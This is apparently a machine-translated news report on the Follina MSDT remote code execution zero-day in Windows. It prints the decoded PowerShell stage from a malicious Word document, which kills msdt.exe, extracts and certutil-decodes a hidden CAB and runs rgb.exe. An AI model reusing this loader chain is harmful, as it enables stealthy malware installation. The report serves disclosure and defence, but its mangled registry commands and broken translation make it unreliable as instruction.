Security experts recently discovered a high-risk Zero Day Code Execution Vulnerability, which affects all currently supported Windows systems There has been relevant evidence that hackers took advantage of this vulnerability at least 7 weeks ago to install malicious programs on the victim's devices without triggering Windows Defender and other terminal protection products.
Researchers of shadow chaser group said on twitter that the vulnerability in Microsoft support diagnostic tool had been reported to Microsoft on April 12, and it had been proved that the vulnerability had been exploited by hackers.
However, in the reply to the researcher, the Microsoft Security Response Center team did not consider the reported behavior as a security vulnerability, because it is speculated that the MSDT diagnostic tool needs a password before executing the payload.
However, on Monday, Microsoft changed its tone, identified the vulnerability as cve-2022-30190, and described it as a "critical" vulnerability.
"There is a remote code execution vulnerability when calling MSDT from a calling application such as word using the URL protocol. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. Then the attacker can install the program, view, change or delete data, or create a new account in the context of user privileges," the announcement said.
At the time of this publication, Microsoft had not released a patch. Instead, it recommends that customers disable the MSDT URL protocol by:
1. Run the command prompt as an administrator.
2. To back up the registry keys, execute the command "reg export hkey\u classesu rootms MSDT filename"
3. Execute the command "reg delete hkeyu classes\u rootms MSDT /f"
Although it was initially omitted by Microsoft, the vulnerability was discovered again when researchers found that the word document uploaded to VirusTotal on Friday took advantage of a previously unknown attack medium.
According to the analysis of researcher Kevin Beaumont, the document uses word to retrieve HTML files from a remote web server. The document then uses the msprotocol URI scheme to load and execute PowerShell commands.
Although in theory this is unlikely to happen, in fact it is possible. When commands in a document are decoded, they are converted to:
$cmd ="c:\Windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList"/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList"/c cd C:\users\public\&&for /r
%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
According to Huntress's explanation, the operations implemented by this script are
Run the following in a hidden window
1. If msdt Exe is running, terminate it
2. Loop through the files in the rar file to find the base64 string encoding the CAB file
3. Store this Base64 encoded CAB file as 1 T
4. Decode the base64 encoded CAB file and save it as 1 c
5. Set 1 C expand the CAB file to the current directory, and finally:
6. Execute rgb Exe (probably compressed in the 1.c CAB file)